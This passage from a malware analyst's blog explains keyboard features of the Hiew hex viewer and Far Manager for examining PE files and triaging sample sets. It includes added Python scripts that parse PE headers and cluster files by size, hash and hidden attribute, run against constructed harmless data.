<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">If you want to see offsets you can press "<b>Alt+F1</b>". </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Also notice what appears in the bar at the bottom of Hiew.</span></span></div>
<div dir="ltr" id="docs-internal-guid-5aa911d9-7fff-0abc-194a-f47c570514ac" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 204px; overflow: hidden; width: 624px;"><img height="204" src="https://lh5.googleusercontent.com/FX5eg2-XqZYA1PLeYnbPid8ZrpJTKIRVzB00u6R9HNMs-jsSuaakoJ0v6bNKZKGYbmaHpbOqzK49fQW5bUXuoHhduXfb5Clmfc2bNHCBodatv0x6f2Oczt49kO3jLEzxOVoiqId-" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>F4</b> - change mode</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>F5</b> - go to an address. To go to a file offset, press F5 and type the offset. For a virtual address, start with a "." and then type the virtual address.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>F6</b> stands for Reference. This is like the XRefs feature of IDA Pro or "find reference" in OllyDbg. It tells you where a particular piece of data or code is referenced.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>F8</b> for viewing the PE header.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Let me press F8 and see what happens.</div>
<div dir="ltr" id="docs-internal-guid-12430550-7fff-4c1a-9ada-2125cd27e869" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 356px; overflow: hidden; width: 624px;"><img height="356" src="https://lh3.googleusercontent.com/8n7MZyIZJj7JeWeqOp9PDv9_0NF8aLUzHQ3QNUJ1m42X7SuS3F5OJHg132-7dphqrklV8rdIUVAYgWKCzX4lkObjGy-0fjWPXFww8WHgfVdD9DCisyAMSPjsfrEcPTy83_iRmB4O" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The PE header pops up and the options at the bottom of the screen change as well. If you press F4 it goes to the PE header in disassembly mode.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F5 goes to entry point</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F6 displays section header</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F9 shows exports if it is a dll</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F10 is used to show data directories</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
F7 shows import table</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 167px; overflow: hidden; width: 624px;"><img height="167" src="https://lh6.googleusercontent.com/rGIU2V9ZT7j99_5uPvhMYO8TgJX8d0DAAFUtBfHkFMtatD3W_jE-F0kXAzfR_3UxiIRcRofARaggz3ucIgWO6kCe2bfu1V0BeC7n8qdOvlu6yTHl6saDJAm_wforFZJ5q8I3UO3i" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">To go to a section of the PE file, move to it in the section list and press Enter. To reach the entry point, open the header view and press F6, then press Enter to see the disassembly at the entry point.</span></span></div>
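The keys above walk the same structures that any PE parser walks: the DOS header's e_lfanew field points at the PE signature, the COFF and optional headers follow, then the section table; the entry point is stored as an RVA that has to be mapped through a section to reach the bytes on disk, which is the file-offset versus virtual-address distinction that Hiew's F5 prompt makes. The following Python script is an added illustration, not code from the original post or from Hiew: it parses those headers, reproduces the "header, F6, Enter" walk to the entry point, and mimics the F5 convention in a hypothetical goto() helper (a plain hex number is a file offset, a leading "." is a virtual address). It runs against a minimal PE32 image constructed in build_sample_pe(), not a real sample.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

PE32_MAGIC, PE32PLUS_MAGIC, IMAGE_FILE_DLL = 0x10B, 0x20B, 0x2000
DIRECTORY_NAMES = ["Export", "Import", "Resource", "Exception", "Security", "BaseReloc", "Debug",
                   "Architecture", "GlobalPtr", "TLS", "LoadConfig", "BoundImport", "IAT",
                   "DelayImport", "CLR", "Reserved"]

@dataclass
class Section:
    name: str
    virtual_address: int  # RVA at which the loader maps the section
    virtual_size: int
    raw_pointer: int      # file offset of the section's bytes on disk
    raw_size: int
    characteristics: int

    def contains_rva(self, rva: int) -> bool:
        # VirtualSize is often smaller than SizeOfRawData (and zero in some malformed files),
        # so use the larger of the two spans, which is what the loader effectively maps.
        return self.virtual_address <= rva < self.virtual_address + max(self.virtual_size, self.raw_size)

@dataclass
class PEInfo:
    is_64bit: bool
    is_dll: bool
    image_base: int
    entry_point_rva: int
    sections: List[Section]
    directories: Dict[str, Tuple[int, int]]  # name -> (rva, size), non-empty entries only

    def section_for_rva(self, rva: int) -> Optional[Section]:
        return next((s for s in self.sections if s.contains_rva(rva)), None)

    def rva_to_offset(self, rva: int) -> Optional[int]:
        """RVA -> file offset; None if no section backs the RVA (e.g. uninitialised data)."""
        if self.sections and rva < self.sections[0].virtual_address:
            return rva  # the headers are mapped 1:1 in front of the first section
        s = self.section_for_rva(rva)
        return None if s is None else rva - s.virtual_address + s.raw_pointer

def parse_pe(data: bytes) -> PEInfo:
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint sits at +16 in PE32 and PE32+
    if magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    directories = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, dirs_off + 8 * i)
        if rva:
            directories[DIRECTORY_NAMES[i]] = (rva, size)
    sections = []
    for i in range(nsections):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ..., Characteristics
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append(Section(f[0].rstrip(b"\0").decode("ascii", "replace"), f[2], f[1], f[4], f[3], f[9]))
    return PEInfo(magic == PE32PLUS_MAGIC, bool(characteristics & IMAGE_FILE_DLL), image_base, entry,
                  sections, directories)

def goto(pe: PEInfo, where: str) -> Optional[int]:
    """Hiew-style F5 (hypothetical helper): plain hex is a file offset, a leading '.' is a virtual address."""
    if where.startswith("."):
        return pe.rva_to_offset(int(where[1:], 16) - pe.image_base)
    return int(where, 16)

def describe_entry(data: bytes) -> dict:
    """What the 'header, F6, Enter' walk lands on: the entry point, its section and its first bytes."""
    pe = parse_pe(data)
    offset, section = pe.rva_to_offset(pe.entry_point_rva), pe.section_for_rva(pe.entry_point_rva)
    return {"entry_rva": pe.entry_point_rva, "entry_va": pe.image_base + pe.entry_point_rva,
            "file_offset": offset, "section": section.name if section else None,
            "bytes": b"" if offset is None else data[offset:offset + 5]}

def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image for this demo (not a real binary): .text and .data, entry in .text."""
    buf = bytearray(0x600)
    buf[0:2], buf[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", buf, 0x3C, 0x40)                                   # e_lfanew
    struct.pack_into("<HHIIIHH", buf, 0x44, 0x14C, 2, 0, 0, 0, 224, 0x0102)   # i386, 2 sections, EXE
    opt = 0x58
    struct.pack_into("<H", buf, opt, PE32_MAGIC)
    struct.pack_into("<I", buf, opt + 16, 0x1010)                             # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", buf, opt + 28, 0x400000)                           # ImageBase
    struct.pack_into("<II", buf, opt + 32, 0x1000, 0x200)                     # Section/File alignment
    struct.pack_into("<I", buf, opt + 92, 16)                                 # NumberOfRvaAndSizes
    struct.pack_into("<II", buf, opt + 96 + 8, 0x2000, 0x28)                  # Import directory, in .data
    sec = opt + 224
    struct.pack_into("<8sIIIIIIHHI", buf, sec, b".text", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    struct.pack_into("<8sIIIIIIHHI", buf, sec + 40, b".data", 0x100, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    buf[0x210:0x215] = b"\x55\x8b\xec\x33\xc0"                                # push ebp; mov ebp,esp; xor eax,eax
    return bytes(buf)

if __name__ == "__main__":
    print(describe_entry(build_sample_pe()))
```

On the constructed image the entry RVA 0x1010 lies in .text (RVA 0x1000, raw pointer 0x200), so it maps to file offset 0x210 and virtual address 0x401010; typing 210 or .401010 at the F5 prompt would therefore land on the same bytes. A packed sample often has an entry point outside the first code section, or an RVA that no section backs at all (rva_to_offset returns None), which is one of the first things worth checking in the header view.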
<div dir="ltr" id="docs-internal-guid-28e2d0d9-7fff-b21a-9471-b8bcc7b5fa21" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 231px; overflow: hidden; width: 624px;"><img height="231" src="https://lh6.googleusercontent.com/e_4ajCDjkb2nifJuo75_tKlGan9dsfXrF9NWmIQ-rPEG1bsIwYgccXpq066-0d2UNSo5QXwOkLXn7kfLMI4gAXTrhLi-8s00UVAEZm1izZQNX779s9iSFWx_PuPqDbJucruWFPon" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Hiew has many more features than the ones shown here; go through its help or simply experiment by pressing different keys. It is a small tool, but even this handful of features saves a researcher a lot of time.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
</div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com1tag:blogger.com,1999:blog-9205939188428310956.post-32499276192516103952019-07-30T22:37:00.002-07:002019-07-30T22:38:18.881-07:00Using Far Manager and Hiew duo in malware Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
I have been using the <b>Far Manager</b> and <b>Hiew</b> combo for a really long time while doing malware analysis. (Unfortunately I could not fix the formatting issues towards the end of the blog.)<br />
<div>
<br />
<div>
Far Manager is not a malware analysis tool at all; it is a keyboard-driven, console alternative to <b>Windows Explorer</b> (Explorer.exe) for browsing the file system. It does, however, solve a number of everyday problems in malware analysis, such as sorting by size, seeing hidden files and viewing processes, and because almost everything is driven by keyboard shortcuts you move through the file system much faster than with the conventional Windows Explorer. Don't worry about memorising the shortcuts; after some time they will be at your fingertips.</div>
<div>
<br /></div>
<div>
You can download Far Manager from https://farmanager.com/. Run it by extracting the archive and double-clicking Far.exe. By default Far Manager shows two panels, left and right, so you can look at two locations of your file system at the same time. <span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">In the screenshot below, the left panel displays the contents of "C:\Program Files\7-Zip" and the right panel displays the contents of "D:\books\c-prog". You browse the files in a directory with the <b>up and down arrow keys</b>; the cursor is the green bar.</span></div>
<div>
<div dir="ltr" id="docs-internal-guid-696e1277-7fff-5f5e-8e97-6b6cacc5f2a6" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="339" src="https://lh3.googleusercontent.com/HnNlEetCaW1xK2CxiM3wL4gvLs7tqBfg9nQCEu58jHKqNQtI7Jg8gyGzyN6R3GSZTFlERLBwnDTjGz7Bv7g5ep6IEJzTvxHc6A5jKE28SswV27-Dd0a6JUbGf4fS4H5O9SWsFUo0" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
At the bottom you can see 1 Help, 2 User Menu, 3 View ... 5 Copy.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
This means F5 is Copy. To explore further options, hold Left Ctrl, Right Ctrl, Left Shift, Right Shift or Alt and watch how the key bar at the bottom changes.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" id="docs-internal-guid-af91c4ca-7fff-14da-00ee-e746a77130cc" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="569" src="https://lh3.googleusercontent.com/Qmwz5Lc05Lh4VTUPqMFgnPNZ54BjXSl9wIFNWo-bzC9cDQJLnl_vPNUTpfc54fp5Nw8nT7XFrTEU15OkA97ctQueF5LC9L1skFFfC4Bh77qu6a0QZvVRckscqiIVaks1AO9Cl0Qo" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
If I hold <b>Ctrl</b>, I see <b>12 Sort</b>. Let's press Ctrl+F12 and see what happens.</div>
<div dir="ltr" id="docs-internal-guid-cda4301e-7fff-b34c-03d2-27945b2aa04a" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="616" src="https://lh5.googleusercontent.com/9BlopxI5FjTIMq3KGU3m3aD8HKPnaRup9A-obval3o7OFNyVGjB-izGmxMM8yKOZh5Ai96m15B2tpc2pXipsHqqGzcEwm3INeti2hgW_LsoJhK6ljcgAQqujcjmDt0lEHmQlTcTu" style="border: none;" width="501" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
You can sort the files in a directory by size, extension and so on. <b>Note:</b> this is useful when an analyst is dealing with a huge set of files. Samples from the same malware family that are close to each other often have a similar size, so you can sort by size and <b>cluster</b> the files of the same size.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">The cursor is on the <b>left panel</b>, on the file "<b>History.txt</b>". To copy History.txt from "C:\Program Files\7-Zip" to "D:\books\c-prog" you press <b>F5</b>; to move it (cut and paste) you press <b>F6</b>. See how quick a cut and paste is. Multiple files can be copied at the same time: to <b>select</b> a file press "<b>Shift+Down/Up arrow</b>" (the same keys deselect a selected file); to select all the files below the cursor press <b>"Shift+Right arrow"</b>, and for the files above it <b>"Shift+Left arrow"</b>. Then press F5 or F6 to start the copy or move.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">To switch between the panels, i.e. to go from "C:\Program Files\7-Zip" to "D:\books\c-prog", press <b>Tab</b>. Use the <b>up and down arrow</b> keys to browse the files within the same directory.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Executables (<b>7z.exe, Uninstall.exe</b>) are shown in <b>green</b> text and directories (<b>"Lang"</b>) in <b>white</b>.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">To open a file in a directory, move the cursor onto it and press <b>Enter</b>: an .exe executes and a .txt file opens in Notepad. <b>Hidden files</b> are shown in light blue. This comes in handy in malware analysis when the malware hides one of its dropped files by setting the hidden attribute in Windows, because Far shows such files while Explorer hides them by default.</span></span></div>
<div dir="ltr" id="docs-internal-guid-7e22ef1c-7fff-53c8-f465-0247b5ef95a9" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="369" src="https://lh5.googleusercontent.com/A-dm_pwaFa7Q_93CVwkUyEkCmpEYneWQigKEpE0AJWybUhbtfieEua5PHqJX4AXbCh1Ij_Uj3AYngt3u0ZSkIjhmAYtFVJyLOWbaIG3bSIlWKB9R4_1ydAuQP2mnbSkDooC9x2nF" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" id="docs-internal-guid-7474962e-7fff-065d-3f77-b60b9482aee5" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">You can see more details of the files in a directory by pressing "</span><span style="font-family: Arial; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Left Ctrl+3</span><span style="font-family: Arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">": the extension, file size, and date and time are shown.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="343" src="https://lh5.googleusercontent.com/pJf1MwV26Ub4cibYlDnZgYqYiSF4KnUmBI5-6fyuN07iC0DvKKqcJU0IBc3FxJ193IUsMi7b_Lc7qdc4xZGso5F2DUg0pkt170o_dv4O5jj7cYxt3c6NHtCh2O86EKtcBbm4DcNb" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Directories can also be navigated with keyboard shortcuts. To enter the "<b>Lang</b>" directory, move the cursor onto it with the up or down arrow key and press Enter. To go to the parent directory press "<b>Ctrl+PgUp</b>".</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span>
<span style="font-family: Arial;"><span style="color: red; font-size: 14.6667px; white-space: pre-wrap;"><b>Searching files in a directory:</b></span></span><br />
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Press <b>Alt</b> plus the first letters of the file name (wildcards are allowed too) and the cursor jumps to the matching file.</span></span><br />
<div dir="ltr" id="docs-internal-guid-28d430d3-7fff-e2a2-21ea-d24395661a73" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 264px; overflow: hidden; width: 624px;"><img height="264" src="https://lh3.googleusercontent.com/lDle88xhVLIw0hKZSbVhLbW2cpimU-gTI6htPc3mYKFlJs8csg22jzouh9u__AsFnW2OAi16BBIcowQEZ7z_Zmg_tAcz8i1uxPauVb8J3DJD0S3TgRyUh43bNLjlTAwfhR1h84IG" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<span style="font-family: "arial";"><span style="color: red; font-size: 14.6667px; white-space: pre-wrap;"><b>Sorting files in a directory:</b></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
You can sort the files in a directory by pressing F12. This gives you the option to sort by size, extension, write time and so on; use it, for example, to cluster files of the same size.<br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 567px; overflow: hidden; width: 487px;"><img height="567" src="https://lh6.googleusercontent.com/BPDnynYdoZHCCqhZpdvui-gE9xc5fgDxlYQARvQu6Xe6IbJcGeuF-rz_f4r0M1FAnl82SCGQLBlNaZEftBKQoFfzR7uhsfFfDZCihNJNWaXN77Bi2Zaz4yziyuTyd64BjcFfw4ag" style="margin-left: 0px; margin-top: 0px;" width="487" /></span></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
</div>
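Far's sort-by-size view is a manual version of a triage step that is easy to script once the sample set grows. The Python script below is an added example, not part of the original post: it buckets a directory of files by exact size (Far's sort order), then hashes within each bucket to separate exact duplicates from same-size-but-different files, which are the interesting candidates for variants of one family. It also reports hidden files, which Far shows and Explorer by default does not. The sample directory comes from make_sample_dir(), which writes a few constructed files (not real malware) into a temporary folder.

```python
import hashlib
import stat
import tempfile
from collections import defaultdict
from pathlib import Path
from typing import Dict, List


def is_hidden(path: Path) -> bool:
    """Hidden by the Windows attribute (what malware usually sets) or by the POSIX dot-name convention."""
    attrs = getattr(path.stat(), "st_file_attributes", 0)      # only present on Windows
    hidden_attr = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2)   # 0x2 is the documented value of the flag
    return bool(attrs & hidden_attr) or path.name.startswith(".")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def cluster_by_size(directory: str) -> List[dict]:
    """Group files by exact size, then split each group by SHA-256.

    Clusters come back in ascending size order, like Far's sort. A cluster with several distinct
    hashes is the interesting case: same size, different content, so possibly variants of one family."""
    by_size: Dict[int, List[Path]] = defaultdict(list)
    for p in Path(directory).iterdir():
        if p.is_file():                                         # hidden files are included, unlike Explorer
            by_size[p.stat().st_size].append(p)
    clusters = []
    for size in sorted(by_size):
        by_hash: Dict[str, List[str]] = defaultdict(list)
        for p in by_size[size]:
            by_hash[sha256_of(p)].append(p.name)
        clusters.append({
            "size": size,
            "files": sorted(p.name for p in by_size[size]),
            "hidden": sorted(p.name for p in by_size[size] if is_hidden(p)),
            "distinct_hashes": len(by_hash),
            "duplicates": {h: sorted(n) for h, n in by_hash.items() if len(n) > 1},
        })
    return clusters


def make_sample_dir() -> str:
    """Constructed sample directory: four 64-byte files (two identical, one variant, one hidden
    variant) plus one unrelated 100-byte file. None of them is real malware."""
    d = tempfile.mkdtemp(prefix="samples_")
    variant_a = b"MZ" + b"A" * 62
    variant_b = b"MZ" + b"B" * 62
    (Path(d) / "invoice.exe").write_bytes(variant_a)
    (Path(d) / "invoice_copy.exe").write_bytes(variant_a)
    (Path(d) / "report.exe").write_bytes(variant_b)
    (Path(d) / ".dropped.dll").write_bytes(b"MZ" + b"C" * 62)
    (Path(d) / "readme.txt").write_bytes(b"x" * 100)
    return d


if __name__ == "__main__":
    for c in cluster_by_size(make_sample_dir()):
        print(c["size"], c["files"], "hidden:", c["hidden"], "distinct:", c["distinct_hashes"])
```

Point it at a real sample directory with cluster_by_size(r"D:\samples") and the 64-byte cluster in the constructed data is what a family cluster looks like in practice: two exact duplicates you only need to analyse once, and two same-size files with different hashes that deserve a closer comparison.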
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br />
<b><span style="color: red;">Creating shortcuts to directories and accessing them:</span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
You can save shortcuts to up to 10 directories, under the keys 0 to 9.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
To save a directory under <b>number 1</b>, go to the directory and press <b>Ctrl+Shift+1</b>.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
To jump to the directory saved under <b>key 1</b>, press <b>Right Ctrl+1</b>. In the same way you can create shortcuts to 10 directories.<br />
<br />
<b><span style="color: red;">Adding tool Shortcuts to Far Manager</span></b>:<br />
As malware researchers we need to run a lot of tools on the samples, and you can add shortcuts to these tools in Far Manager. I want to add Hiew (Hacker's View) to my Far Manager so that I can open samples with it.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Before adding Hiew to Far, I downloaded Hiew from http://www.hiew.ru/ and extracted it to "D:\tools\hiew" on my system. I need to add <b>Hiew32Demo.exe</b> to Far Manager.</span></span></div>
<div dir="ltr" id="docs-internal-guid-07cd5bf3-7fff-853e-aafd-a99c34ce595b" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 356px; overflow: hidden; width: 540px;"><img height="356" src="https://lh4.googleusercontent.com/FGMorII5mmcH5k7Zhwa7FR0qUmhnctTGdr5P9UOP41gl3FxpdUrRNNzrUTw5GHQ94VHSt_s-NQkpQS6QukTQ-64UMijpd6SkLqu9VTo0BjQwL6Y1YF1YWVUjm2zz1h0EVrYKYpJS" style="margin-left: 0px; margin-top: 0px;" width="540" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
